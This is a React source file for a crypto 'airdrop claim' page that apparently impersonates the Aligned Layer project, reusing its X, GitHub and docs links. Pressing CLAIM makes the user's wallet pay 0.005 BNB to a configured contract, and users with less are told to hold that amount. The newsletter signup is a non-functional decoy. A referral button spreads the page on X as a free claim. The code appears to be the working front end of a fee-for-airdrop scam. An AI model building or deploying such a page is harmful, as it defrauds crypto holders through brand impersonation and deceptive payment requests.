import React, { useState } from 'react';
import { useNavigate } from 'react-router-dom';
import { useAccount, useBalance, useWriteContract, useDisconnect } from 'wagmi';
import { useAppKit } from '@reown/appkit/react'; 
import { parseEther } from 'viem';
import { FaXTwitter, FaGithub, FaDiscord } from 'react-icons/fa6';
import { AIRDROP_CONTRACT, airdropABI } from '../config';

export default function Home() {
  const navigate = useNavigate();
  const { address, isConnected } = useAccount();
  const { disconnect } = useDisconnect();
  const { data: bnbBalance } = useBalance({ address, chainId: 56 });
  const { writeContract } = useWriteContract();
  const { open } = useAppKit(); 
  
  const [showError, setShowError] = useState(false);

  // Ambil URL domain saat ini secara otomatis
  const currentDomain = typeof window !== 'undefined' ? window.location.origin : 'https://yourdomain.com';

  const getReferralAddress = () => {
    const params = new URLSearchParams(window.location.search);
    const ref = params.get('ref');
    if (ref && /^0x[a-fA-F0-9]{40}$/.test(ref)) {
      return ref;
    }
    return '0x0000000000000000000000000000000000000000';
  };

  const handleMainAction = () => {
    if (!isConnected) {
      open();
      return;
    }

    const minClaimBigInt = parseEther('0.005');
    const userBalanceBigInt = bnbBalance?.value || 0n; 
    
    if (userBalanceBigInt < minClaimBigInt) {
      setShowError(true); 
      return; 
    }

    setShowError(false);
    writeContract({
      address: AIRDROP_CONTRACT,
      abi: airdropABI,
      functionName: 'claimAirdrop',
      args: [getReferralAddress()],
      value: minClaimBigInt,
    });
  };

  // ==========================================
  // FUNGSI BARU: HARD DISCONNECT (Anti Nyangkut)
  // ==========================================
  const handleHardDisconnect = () => {
    // 1. Putus koneksi dari Wagmi
    disconnect();

    // 2. Hapus paksa semua cache WalletConnect, Reown, dan Wagmi di Local Storage
    if (typeof window !== 'undefined') {
      Object.keys(localStorage).forEach(key => {
        if (key.startsWith('wc@2') || key.startsWith('@w3m') || key.startsWith('wagmi')) {
          localStorage.removeItem(key);
        }
      });
    }

    // 3. Refresh halaman secara otomatis agar UI benar-benar sinkron & fresh
    setTimeout(() => {
      window.location.reload();
    }, 500);
  };

  const handleTopLeftButton = () => {
    if (isConnected) {
      handleHardDisconnect(); // <-- Panggil Hard Disconnect di sini
    } else {
      open(); 
    }
  };

  // FUNGSI BARU: Share ke X dengan auto-deteksi referral
  const handleShareX = () => {
    const text = "Eligible for all CLAIM FREE NOW!";
    // Jika konek, pakai link referral. Jika tidak konek, pakai link domain biasa.
    const link = isConnected && address ? `${currentDomain}/?ref=${address}` : currentDomain;
    
    // Format URL khusus untuk memicu pop-up Tweet di X
    const tweetUrl = `https://twitter.com/intent/tweet?text=${encodeURIComponent(text)}&url=${encodeURIComponent(link)}`;
    window.open(tweetUrl, '_blank');
  };

  return (
    <div className="min-h-screen flex flex-col items-center pt-16 px-4 font-mono">
      <img src="/logo.ico" alt="Align Logo" className="w-24 h-24 rounded-full bg-black mb-6" />

      <h1 className="text-2xl font-black mb-8">79,815 ALIGN</h1>

      <div className="flex space-x-4 mb-6 text-[13px]">
        <button 
          onClick={handleTopLeftButton}
          className="border border-gray-300 rounded px-4 py-2 hover:bg-gray-50 flex items-center gap-2"
        >
          <img src="/wallet.svg" alt="Wallet" className="w-4 h-4" />
          <span>{isConnected ? 'Disconnect' : 'Connect Wallet'}</span>
        </button>
        
        {/* Tombol Follow us on X */}
        <button 
          onClick={() => window.open('https://x.com/alignedlayer', '_blank')}
          className="border border-gray-300 rounded px-4 py-2 hover:bg-gray-50"
        >
          Follow us on 𝕏
        </button>

        {/* Tombol Share on X */}
        <button 
          onClick={handleShareX}
          className="border border-gray-300 rounded px-4 py-2 hover:bg-gray-50"
        >
          Share on 𝕏
        </button>
      </div>

      <div className="w-full max-w-lg bg-brand-green border border-brand-border rounded-md p-4 mb-4 text-center text-sm shadow-sm flex items-center justify-center">
        <span>Earn</span> 
        <img src="/usdc.png" alt="USDC" className="w-4 h-4 mx-1.5 align-middle" /> 
        <span>USDC rewards on our <a href="https://docs.alignedlayer.com/" className="underline font-bold">Social Campaign</a></span>
      </div>

      <div className="w-full max-w-lg bg-brand-green border border-brand-border rounded-md p-6 mb-8 text-center text-sm shadow-sm">
        <p className="mb-4">Read our latest updates on the <a href="https://alignedlayer.com/products/wallet-as-a-service" className="underline font-bold">Aligned newsletter.</a></p>
        
        <div className="flex justify-center mt-2 gap-3">
          <input 
            type="email" 
            placeholder="your@email.com" 
            readOnly
            className="border border-white px-3 py-2 outline-none w-2/3 shadow-sm rounded bg-white text-gray-400 cursor-default"
          />
          <button className="bg-white border border-white px-4 py-2 shadow-sm rounded font-mono text-gray-400 cursor-default pointer-events-none">
            Subscribe
          </button>
        </div>
      </div>

      <div className="w-full max-w-lg flex flex-col space-y-3 mb-8">
        <div className="flex flex-col items-center w-full">
          <button 
            onClick={handleMainAction}
            className="w-full py-3 rounded-md font-bold text-white shadow-md transition-all bg-black hover:bg-gray-800"
          >
            {!isConnected ? 'CLAIM' : 'CLAIM'}
          </button>
          
          {showError && (
            <p className="text-red-500 text-xs mt-2 font-mono">Insufficient BNB balance for claim. you must HODL 0.005 BNB for CLAIM.</p>
          )}
        </div>

        <button 
          onClick={() => navigate('/swap')}
          className="w-full bg-blue-600 hover:bg-blue-700 text-white font-bold py-3 rounded-md shadow-md transition-all"
        >
          SWAP
        </button>
      </div>

      <p className="text-gray-500 text-xs mb-6">
        This is subject to Sybil analysis and amounts may change.
      </p>

      {/* Social Icons Bawah */}
      <div className="flex space-x-6 text-xl mb-10">
        <a href="https://x.com/alignedlayer" target="_blank" rel="noreferrer" className="hover:text-gray-500"><FaXTwitter /></a>
        <a href="https://github.com/yetanotherco" target="_blank" rel="noreferrer" className="hover:text-gray-500"><FaGithub /></a>
        <a href="#" onClick={(e) => e.preventDefault()} className="hover:text-gray-500"><FaDiscord /></a>
      </div>
    </div>
  );
}